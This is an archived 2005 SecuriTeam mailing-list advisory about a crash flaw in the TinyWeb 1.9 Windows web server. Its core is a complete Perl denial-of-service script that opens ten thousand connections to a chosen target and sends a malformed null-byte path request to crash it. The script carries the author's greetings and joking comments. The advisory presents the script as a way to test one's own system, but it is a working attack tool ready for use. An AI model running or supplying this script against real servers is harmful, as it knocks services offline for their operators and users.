[EXPL] TinyWeb Server DoS Exploit

• Previous message: SecuriTeam: "[TOOL] Travesty - Network Hardware Addresses Manager"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 1 Feb 2005 13:52:44 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  TinyWeb Server DoS Exploit
------------------------------------------------------------------------

SUMMARY

 <http://www.ritlabs.com/tinyweb/> TinyWeb is "extremely small (executable
file size is 53K), simple (no configuration other than through the command
line) and fast (consumes minimum of system resources) Win32 daemon for
regular (TCP/http) and secure (SSL/TLS/https) web servers".

A vulnerability in TinyWeb allows remote attackers to cause the server to
crash by sending it a special request. The following exploit code can be
used to test your system for the mentioned vulnerability.

DETAILS

Exploit:
#TinyWeb version 1.9 DoS Exploit
#Coded bY ++Karak0rsan++
#Usage:perl tiny.pl [target]
#Greetz:Phalaposher,r3d_b4r0n,Hurby,ZzagorR,L4M3R,zeronc,Atak,sloan,fox
and
all my friends
# w0rdz: cengiz g t ne sokam senin ehehheh bak exploit yay nlan rsa reziL
olacan :D ama #yay nlanmaz belki yay nlansada bo ver nickini s ylemiyom
anlamazlar :P okullar a l yo peder benim #bilg. kald r yo ne yapcam ben
bilmiyom a.k :) siktiri boktan bi dos exploiti yazd k yolluyoz g venlik
#sitesine :D neyse uzatmayal m "I AM 15 YEARS OLD" ya m z belirtelim :D

$target=$ARGV[0];

if(!$ARGV[0]){
        print "TinyWeb version 1.9 DoS Exploit\n";
        print "Coded by ++Karak0rsan++\n";
        print "Usage:perl tiny.pl [target]\n";
}

use IO::Socket;
$sock = new IO::Socket::INET( PeerAddr => $target,
PeerPort => 80,
Proto => 'tcp',
Type => SOCK_STREAM, );
close($sock);
if($sock){
        print "[+]Attacking...\n";
}

$ish=1;

do {
$ish++;
use IO::Socket;
$socket = new IO::Socket::INET( PeerAddr => $target,
PeerPort => 80,
Proto => 'tcp',
Type => SOCK_STREAM, ) or die "Didnt Connect,please check your target
address!\n";
print $socket "GET /cgi-bin/.%00./dddd.html HTTP/1.0\r\n";
close($socket);
} while ($ish < 10000);

print "OK ;)\n";
exit();

ADDITIONAL INFORMATION

The information has been provided by <mailto:karakorsankara@hotmail.com>
KaraKorsan Deli.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[TOOL] Travesty - Network Hardware Addresses Manager"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]